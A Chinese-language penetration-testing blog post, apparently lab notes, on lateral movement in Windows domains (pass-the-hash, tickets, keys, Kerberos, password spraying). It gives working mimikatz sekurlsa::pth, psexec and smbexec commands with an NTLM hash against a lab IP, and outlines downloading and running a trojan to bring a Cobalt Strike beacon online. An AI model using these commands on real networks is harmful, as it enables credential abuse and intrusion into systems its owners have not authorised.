内网安全-横向移动&PTH 哈希&PTT 票据&PTK 密匙&Kerberos&密码喷射

一.域横向pth,mimkatz,NTLM

windwos server 2012 R2之前可能是NTLM和LM,之后为NTLM

1.mimkatz ptk

使用mimkatz进行横向移动

mimikatz sekurlsa::pth /user:administrator(目标本地用户名) /domain:192.168.3.32(目标ip) /ntlm:518b98ad4178a53695dc997aa02d455c(目标hash)

在执行命令机器弹出cmd窗口

使用该命令进行传递木马

创建bshell:

执行:

在内网攻击机器进行hash传递

cs上配置socket节点

配置代理

使用psexec进行hash传递返回被控机器shell终端:

.\psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

上线cs:

1.上传木马到web目录

2.使用cmd下载木马并且执行

使用smbexec进行传递

.\smbexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

2.pth-漏洞&kekeo&Ticks

1.ms14068

2.kekeo(高权限,需要NTGM)

相关推荐
Hello.Reader1 天前
Kafka 安全SASL 认证全栈实战从 JAAS 到 Kerberos、PLAIN、SCRAM、OAUTH 与委托令牌
分布式·安全·kafka
xixixi777771 天前
SOC(安全运营中心)
网络·安全·soc·安全运营中心
lypzcgf1 天前
Coze源码分析-资源库-编辑插件-后端源码-安全与错误处理
安全·插件·coze·coze源码分析·智能体平台·ai应用平台·agent平台
粟悟饭&龟波功1 天前
【网络安全】一、入门篇:读懂 HTTP 协议
安全·web安全·http
骥龙1 天前
粤港澳全运会网络安全防御体系深度解析:威胁态势与实战防护
网络·安全·web安全
安娜的信息安全说2 天前
企业身份认证系统选型:Azure AD 与 Keycloak 功能详解
安全·microsoft·keycloak·azure ad
安当加密2 天前
SLA操作系统双因素认证实现Windows远程桌面OTP双因子安全登录—从零搭建企业级RDP安全加固体系
windows·安全
你的人类朋友2 天前
HTTP请求结合HMAC增加安全性
前端·后端·安全
Dest1ny-安全2 天前
2025年,今后需要进步的方面
安全
BenSmith2 天前
一次入门向v8漏洞复现
安全